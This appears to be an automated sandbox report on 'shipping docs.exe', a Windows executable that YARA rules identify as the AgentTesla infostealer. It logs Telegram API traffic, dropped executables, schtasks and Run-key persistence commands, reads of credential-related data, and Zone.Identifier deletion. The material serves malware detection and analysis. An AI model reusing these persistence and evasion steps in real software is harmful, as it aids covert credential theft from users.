                Source: unknownDNS traffic detected: queries for: api.telegram.org
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
                Source: VMqTMMD.exe, 0000000E.00000002.340414070.00000000010F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                .NET source code contains very large array initializations
                Source: 3.0.shipping docs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b3C2C41D0u002d332Cu002d4962u002d9787u002d6AE70BED21B1u007d/u003373B1236u002d2AE2u002d49F0u002d9CFAu002dD6A6068282F0.csLarge array initialization: .cctor: array initializer size 10969
                Source: shipping docs.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: VMqTMMD.exe PID: 1280, type: MEMORYSTRMatched rule: webshell_jsp_generic_base64 date = 2021/01/24, author = Arnim Rupp, description = Generic JSP webshell with base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 1b916afdd415dfa4e77cecf47321fd676ba2184d
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_00B7E2D80_2_00B7E2D8
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_00B7E2C80_2_00B7E2C8
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_00B7BFC40_2_00B7BFC4
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044836350_2_04483635
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044800400_2_04480040
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044813D00_2_044813D0
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_04485C180_2_04485C18
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044816580_2_04481658
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044816680_2_04481668
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044866280_2_04486628
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044808000_2_04480800
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044800060_2_04480006
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044808100_2_04480810
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044810A10_2_044810A1
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044810B00_2_044810B0
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_044813C10_2_044813C1
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_04A465B80_2_04A465B8
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 0_2_04A465A90_2_04A465A9
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_02DFFA003_2_02DFFA00
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_02DF6C003_2_02DF6C00
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F7E1A3_2_061F7E1A
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F88183_2_061F8818
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F00403_2_061F0040
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F09103_2_061F0910
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F29F83_2_061F29F8
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066F00403_2_066F0040
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066F18503_2_066F1850
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066F70103_2_066F7010
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066FA8B83_2_066FA8B8
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066F41683_2_066F4168
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066F89A03_2_066F89A0
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066F6FBD3_2_066F6FBD
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066FCC283_2_066FCC28
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066F40183_2_066F4018
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_0684F2403_2_0684F240
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_0684C7C83_2_0684C7C8
                Source: shipping docs.exe, 00000000.00000002.265751138.00000000024F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs shipping docs.exe
                Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8c0e5951-f0e7-4ebf-a643-3c2760ac7891.exe4 vs shipping docs.exe
                Source: shipping docs.exe, 00000000.00000002.282085594.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs shipping docs.exe
                Source: shipping docs.exe, 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8c0e5951-f0e7-4ebf-a643-3c2760ac7891.exe4 vs shipping docs.exe
                Source: shipping docs.exe, 00000000.00000000.236877884.00000000001D6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameV3VSkFfg.exe8 vs shipping docs.exe
                Source: shipping docs.exe, 00000003.00000002.503928846.0000000000DD8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs shipping docs.exe
                Source: shipping docs.exe, 00000003.00000000.262634318.0000000000438000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename8c0e5951-f0e7-4ebf-a643-3c2760ac7891.exe4 vs shipping docs.exe
                Source: shipping docs.exeBinary or memory string: OriginalFilenameV3VSkFfg.exe8 vs shipping docs.exe
                Source: shipping docs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: yVGAJfiVEvtg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: VMqTMMD.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: shipping docs.exeReversingLabs: Detection: 73%
                Source: shipping docs.exeVirustotal: Detection: 47%
                Source: C:\Users\user\Desktop\shipping docs.exeFile read: C:\Users\user\Desktop\shipping docs.exeJump to behavior
                Source: shipping docs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\shipping docs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\shipping docs.exe C:\Users\user\Desktop\shipping docs.exe
                Source: C:\Users\user\Desktop\shipping docs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\shipping docs.exeProcess created: C:\Users\user\Desktop\shipping docs.exe {path}
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe {path}
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe {path}
                Source: C:\Users\user\Desktop\shipping docs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmpJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess created: C:\Users\user\Desktop\shipping docs.exe {path}Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe {path}Jump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe {path}
                Source: C:\Users\user\Desktop\shipping docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exeFile created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7934.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/9@3/2
                Source: C:\Users\user\Desktop\shipping docs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: shipping docs.exe, 00000003.00000002.533196722.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.536517685.000000000345B000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.533441099.00000000031AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: shipping docs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\shipping docs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4404:120:WilError_01
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeMutant created: \Sessions\1\BaseNamedObjects\FlPBfsykXUODZXqmIBIomiteD
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_01
                Source: 3.0.shipping docs.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.shipping docs.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\shipping docs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\shipping docs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: shipping docs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: shipping docs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_02DF0007 push ecx; retf 3_2_02DF0042
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_02DF0430 push ecx; retf 3_2_02DF0446
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F3692 push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F3701 push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061FE767 push es; ret 3_2_061FE868
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F3448 push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F34CF push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F7CF0 push es; ret 3_2_061F7D00
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F353F push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F35AD push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_061F1910 push es; ret 3_2_061F1920
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066FA8B8 push cs; retn 066Fh3_2_066FC819
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066F9FF8 pushfd ; retf 065Fh3_2_066FA08D
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_066FC8DE push es; retf 3_2_066FC928
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_06849AE1 push es; ret 3_2_06849AF0
                Source: C:\Users\user\Desktop\shipping docs.exeCode function: 3_2_06844387 push edi; retn 0000h3_2_06844389
                Source: initial sampleStatic PE information: section name: .text entropy: 7.898839095668671
                Source: initial sampleStatic PE information: section name: .text entropy: 7.898839095668671
                Source: initial sampleStatic PE information: section name: .text entropy: 7.898839095668671
                Source: C:\Users\user\Desktop\shipping docs.exeFile created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeJump to dropped file
                Source: C:\Users\user\Desktop\shipping docs.exeFile created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\shipping docs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
                Source: C:\Users\user\Desktop\shipping docs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMDJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMDJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\shipping docs.exeFile opened: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeFile opened: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
